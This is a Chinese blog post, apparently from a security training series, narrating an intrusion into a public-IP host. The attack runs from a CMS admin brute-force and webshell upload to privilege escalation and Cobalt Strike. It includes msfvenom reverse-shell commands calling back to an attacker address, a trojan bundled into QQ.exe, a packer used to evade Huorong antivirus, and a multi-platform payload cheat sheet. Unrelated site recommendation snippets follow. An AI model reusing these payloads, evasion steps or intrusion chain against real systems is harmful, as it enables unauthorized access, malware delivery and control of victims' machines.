阿一网络安全培训学习第55天的一次真实环境下渗透的全过程

已于 2024-05-31 11:38:18 修改
阅读量885 收藏 9
点赞数 12
文章标签: 服务器 linux 网络
于 2024-05-20 14:24:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ayixy/article/details/139063973
版权
获得一个靶机 ip
这是一个公网 ip
拿到 ip 后第一步的思路就是去用工具去扫端口,看有哪些端口开放有访问
这里我用到的是某大神开发的工具:TscanPlus 无影
直接扫全端口,但是已经出来可以访问的的地方了,我们就不多扫了,直接访问地址
这里之前渗透的时候是正常页面的,但是好像后面我们打进去后把页面删掉了,但是没关系
不影响,他保留了一个技术支持:快排 cms
这个就是我们的思路
我们看到是一个 cms,去找相应的 cms 漏洞
这里我们找到了一个快排 cms 的文件上传漏洞
然后开始复现
访问网站后台登录界面
1. http: //xxx.xxx.xxx.xxx/admin.php/index/login.html
账号密码默认是 admin/admin
但是我们尝试登录后发现密码不正确
我们直接开 bp 爆破
这里爆出来了密码是 password,我们直接登录
来到后台,刚刚看到的漏洞文章上提到,在文件管理界面有一个文件上传漏洞,我们尝试复
现一下
这里有个上传点,我们尝试传一句话马
上传的过程中抓个包
这里抓包后看到有上传路径,这样我们就不用去找了
访问一下我们上传的马,看有没有解析
解析了,那么我们直接用 webshell 软件直接连,我这里用的是蚁剑,当然冰蝎、哥斯拉都可
这里我们就连进来了
获取到 webshell 后我们来看一下权限
在终端中输入 whoami
这里我们看到我们的权限是 myweb,权限很低
然后来查一下主机信息 输入:systeminfo
是一台 win7 的机器,只有默认补丁没有打其他补丁,那么就有很多操作空间了
首先想到的就是用 msf 打永恒之蓝,但是之前有试过,他的 445 端口没有迁出来,没有办法
连,所以这里我们就用最基础的办法,用 msf 写马反弹 shell
这里有打过,所以知道这台机器里面有个火绒,所以我们在需要做面上,我们可以利用之前
学到的知识,把我们的马绑在一个正常的软件上打开运行
这里拿 qq 做例子
msfvenom -l encoders 查看编码类型
编码类型,我们选择 x86/shikata_ga_nai 编码
捆绑木马
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.110 LPORT=8080 -e
x86/shikata_ga_nai -x /root/lenkee/share/QQ.exe -i 5 -f exe -o /root/lenkee/share/QQ1.exe 其中 -i 5 是进行 5 次编码,其目的是为了面杀作用,但是这样作用已经没用了,照样被
杀。生成了 QQ2.exe 文件
然后我们吧通过我们刚刚获得的 webshell 上传这个马
msf 中开启监听
然后在 webshell 中运行我们的马就能在 msf 中上线了
我做这个用的免杀简单一点,直接用软件套壳免杀,我们在 msf 中生成一个 windows 的马
然后拿出来套壳免杀火绒
具体操作流程:
# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f
elf > shell.elf
# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f
exe > shell.exe
# Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f macho >
shell.macho
# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
shell.php
# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f
asp > shell.asp
# JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
shell.jsp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f war >
shell.war
# Bath
msfvenom -p cmd/unix/reverse_bash LHOST=你的 IP LPORT=你监听的端口 -f raw >
shell.sh
# Perl
msfvenom -p cmd/unix/reverse_perl LHOST=你的 IP LPORT=你监听的端口 -f raw > shell.pl
# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
shell.py
在选择 Windows 的木马生成命令
会生成一个马
将这个 shell.exe 拖出来做免杀
因为我用的是 vps,所以我们开启一个 http 服务直接去下载这个 exe
然后我们打开我们的套壳软件:VProtect
将我们要免杀的软件丢进去然后点应用保护,他就会在原软件下生成一个相同的软件
这个 shell_VP.exe 就是我们套壳后的木马
我们打开火绒运行一下试试
免杀成功,我们把它通过 webshell 传进去
现在我们在 msf 开启监听
同样的道理 run 然后再 webshell 中启动刚刚免杀的 exe
转到 msf 上了我们就可以进一步提权了
第一种:
Meterpreter 基础提权
Getsystem 自动提权
这里用不了会卡死,暂时找不到原因
第二种 迁移,因为 getshell 后我们的权限为文件夹当前权限,我们把他迁移到起他高权限
的文件夹下进而提权
Ps
现在就获得了 system 权限了
创建新用户发现创建不了,我们换个方式提权再试试
我们直接用 cs 上线
Cs 都上线了,能干的是就太多了。
结束,下班!
网安大队长阿一
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
阿一鲍鱼-阿一鲍鱼1980.docx
11-25
阿一鲍鱼-阿一鲍鱼1980.docx
谓词归结逻辑第三版,彻底修改错误,此处特别鸣谢阿一同学的监工与验收
03-13
人工智能实验
最全全新英语国际音标表附中文读音.doc
09-30
英语国际音标是学习英语发音的重要工具,它共有48个音标,分为元音和辅音两大类。本文将详细介绍每个音标的发音方法。 一、元音(20个) 1. **前元音**: - `/i:/` 衣(长音),发音时嘴唇微微张开,舌尖抵下齿,...
南昌赣江新地项目品牌推广策略案_76PPT_九机构.pptx
11-24
南昌赣江新地项目是一个大型综合商业体,其品牌推广策略是关键所在。该策略案主要探讨了如何从影响力转化为品牌力,以实现项目的长期成功和可持续经营。 首先,赣江新地拥有得独厚的地理位置,位于红角洲,...
美国服务器稳定么?影响服务器稳定性的6个因素
petaexpress的博客
08-09 654
美国服务器的稳定性是相当不错的,这主要得益于其先进的技术、成熟的基础设施以及严格的管理措施。美国拥有众多知名的服务器提供商,这些提供商通常会采用顶级的硬件设施,如英特尔、AMD等知名品牌的处理器,以及三星、金士顿等品牌的内存和硬盘,这些硬件设备在全球范围内具有较高的市场份额和良好的口碑,性能稳定可靠。
什么是核心交换机?这样回答太到位了
08-12 500
核心交换机是一种高性能的网络设备,位于网络层次结构的最顶层,负责处理大量数据流量并将其快速转发到正确的目的地。在这个背景下,核心交换机作为网络基础设施的中枢神经,扮演着至关重要的角色,相信大家在工作中也经常打交道。如果想从0到1系统学习,也欢迎私信我,告知学习意向,我会为你推荐最适合你的方式。今就来讲讲核心交换机,从交换机是什么,到如何选择与部署,统统给你盘明白。衡量交换机最大数据处理能力的指标,确保它能满足当前和未来的网络流量需求。)和第3层(网络层)的交换功能,有的还支持第4层到第7层的应用级处理。
vsftpd 文件服务器A中的文件,需复制到B服务器,关闭防火墙,A的文件可以复制到B,打开防火墙,就复制失败分析原因分析和rsync实现文件同步
雨笋情缘的专栏
08-12 662
确认防火墙配置是否允许FTP流量通过。调整VSFTPD配置以启用被动模式并指定合适的端口范围。考虑使用SFTP、SCP或rsync作为替代方案。请根据实际情况调整上述建议。如果有具体的操作系统版本或者详细的VSFTPD配置信息,我可以提供更加具体的帮助。
华为路由的AAA是什么?
huaqianzkh的专栏
08-14 519
华为路由的AAA是Authentication(认证)、‌Authorization(授权)和Accounting(计费)的简称,‌是一种提供认证、‌授权和计费的安全管理机制。‌AAA作为一种网络安全管理机制,‌主要提供以下功能和服务:‌认证:‌验证用户是否可以获得网络访问权,‌确定哪些用户可以访问网络。‌授权:‌授权用户可以使用哪些服务,‌即对用户赋予不同的权限,‌限制用户可以使用的服务。‌计费。
linux为QT程序创建桌面应用
王尼莫的博客
08-12 210
【代码】linux为QT程序创建桌面应用。
出省了为什么ip地址没变?怎么修改自己的ip地址变外省的
hgdlip的博客
08-14 455
在数字时代,IP地址作为网络世界中每台设备的唯一标识,其重要性不言而喻。然而,许多人在跨省份旅行或工作时,可能会发现尽管自己已经身处新的地域,但IP地址却并未随之改变。这一现象不仅令人困惑,那么,为什么会出现这种情况?我们又该如何修改自己的IP地址以反映当前的外省位置呢?本文将为您详细解答这些问题。
PX4-Autopolite linux环境下源码编译中遇到的一些问题及相应解决办法
kirioo的博客
08-12 958
PX4源码编译
06_Linux中如何让程序重启后自动启动
最新发布
qq_40681630的博客
08-15 198
假设你的应用程序位于 /opt/myapp 目录下,并且有一个名为 myapp 的可执行文件。我们将创建一个名为 myapp.service 的文件,以定义如何启动、停止和服务的行为。[Unit][Service][Install][Unit] 部分Description:服务的描述。After:定义此服务依赖于哪些其他服务。在这里,我们指定 network.target,意味着服务将在网络准备好之后启动。[Service] 部分Type:定义服务的启动类型。
playwright链接本地浏览器,实现自动登录。
qq_38880880的博客
08-12 157
【代码】playwright链接本地浏览器,实现自动登录。
【busybox记录】【shell指令】uname
44083579的博客
08-12 363
uname指令用法
手把手教你CNVD漏洞挖掘 + 资产收集
2301_80127209的博客
08-12 654
挖掘CNVD漏洞有时候其实比一般的edusrc还好挖,但是一般要挖证书的话,还是需要花时间的,其中信息收集,公司资产确定等操作需要花费一定时间的。下面就记录下我之前跟一个师傅学习的一个垂直越权成功的CNVD漏洞通杀(仅作为思路分享)。
国内机房与海外机房之间的区别是什么?
wanhengwangluo的博客
08-14 600
服务器的配置上国内的徐州机房一般会受到电信和网通等运营商的影响,配置方面会相对简单一点,但是也会提供多个服务器配置选项,企业能够根据自身的业务需求来选择合适的服务器;海外机房与国内机房的服务器还是有着多方面的区别的,首先在地理位置上海外机房通常是位于中国以外的国家或者是地区,而国内机房则是包含中国各大城市的数据中心,比如徐州的淮海大数据中心。以上就是小编今分享的内容了,如果还想了解更多内容,或者对服务器感兴趣的话,可以持续关注万恒网络科技,对于不了解和需要进行咨询的地方,也可以私信或评论小编!
vsc远程连接centos
Mzylq的博客
08-12 182
此时说明:已经添加连接成功了,后面只需正常点击连接即可。1.查看linux系统下的用户名和ip地址。3.远程连接linux下的centos系统。
高可用集群KEEPALIVED
weixin_72104132的博客
08-12 941
Keepalived是Linux下一个轻量级别的高可用解决方案。高可用(High Avalilability,HA),其实两种不同的含义:广义来讲,是指整个系统的高可用行,狭义的来讲就是之主机的冗余和接管,它与HeartBeat RoseHA 实现相同类似的功能,都可以实现服务或者网络的高可用,但是又有差别,HeartBeat是一个专业的、功能完善的高可用软件,它提供了HA 软件所需的基本功能,比如:心跳检测、资源接管,检测集群中的服务,在集群节点转移共享IP地址的所有者等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值